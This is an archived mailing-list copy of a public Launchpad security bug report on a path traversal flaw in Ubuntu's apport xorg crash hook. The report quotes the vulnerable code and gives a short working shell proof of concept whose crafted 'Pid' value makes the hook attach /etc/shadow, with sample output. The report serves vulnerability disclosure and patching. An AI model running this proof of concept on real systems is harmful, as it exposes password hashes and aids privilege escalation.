openjdk team mailing list archive
-
openjdk team
-
Mailing list archive
-
Message #14205
[Bug 1933832] Re: Path traversal leads to arbitrary file read
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of OpenJDK,
which is subscribed to openjdk-8 in Ubuntu.
https://bugs.launchpad.net/bugs/1933832
Title:
Path traversal leads to arbitrary file read
Status in apport package in Ubuntu:
Fix Released
Status in openjdk-13 package in Ubuntu:
New
Status in openjdk-14 package in Ubuntu:
New
Status in openjdk-15 package in Ubuntu:
New
Status in openjdk-16 package in Ubuntu:
New
Status in openjdk-17 package in Ubuntu:
New
Status in openjdk-18 package in Ubuntu:
New
Status in openjdk-8 package in Ubuntu:
New
Status in xorg package in Ubuntu:
New
Bug description:
While reiterating the issues reported in
https://bugs.launchpad.net/bugs/1917904, Stephen Röttger (@_tsuro)
mentioned, that the second issue "Arbitrary file read in package-
hooks/source_xorg.py (Info)" might additionally contain a path
traversal vulnerability. This was confirmed by developing a PoC, that
enables a user to read arbitrary files in the context of the root
user, leading to elevation of privileges. Exploiting this issue
requires, that automatic crash reporting is enabled.
The following excerpt of the file `package-hooks/source_xorg.py` shows the vulnerable code:
if True or report.get('SourcePackage','Unknown') == "compiz" and "ProcStatus" in report:
compiz_pid = 0
pid_line = re.search("Pid:\t(.*)\n", report["ProcStatus"]) # [0]
if pid_line:
compiz_pid = pid_line.groups()[0]
compiz_state_file = '/tmp/compiz_internal_state%s' % compiz_pid # [1]
attach_file_if_exists(report, compiz_state_file, "compiz_internal_states")
While in [0] the `pid_line` is extracted, this value (if successfully matched) is appended to the file path resulting in `compiz_state_file` [1], which is subsequently attached to the crash file.
Using a `Pid` such as `JRN/../../../../etc/shadow` therefore results in the file `/etc/shadow` being attached (after creating the directory `/tmp/compiz_internal_stateJRN`).
The following POC (tested on 20.04/21.04 Desktop) exploits this issue
to read the file `/etc/shadow`:
mkdir /tmp/compiz_internal_stateJRN/;pid=$'\tJRN/../../../etc/shadow';cat << EOF > /var/crash/poc.crash
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:$pid
Uid:$pid
EOF
When reading the crash file (after `whoopsie-upload-all` ran), the contents of the file `/etc/shadow` are indeed attached:
grep -A3 compiz_internal /var/crash/poc.crash
compiz_internal_states:
root:!:18393:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.
Best regards,
Maik
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832/+subscriptions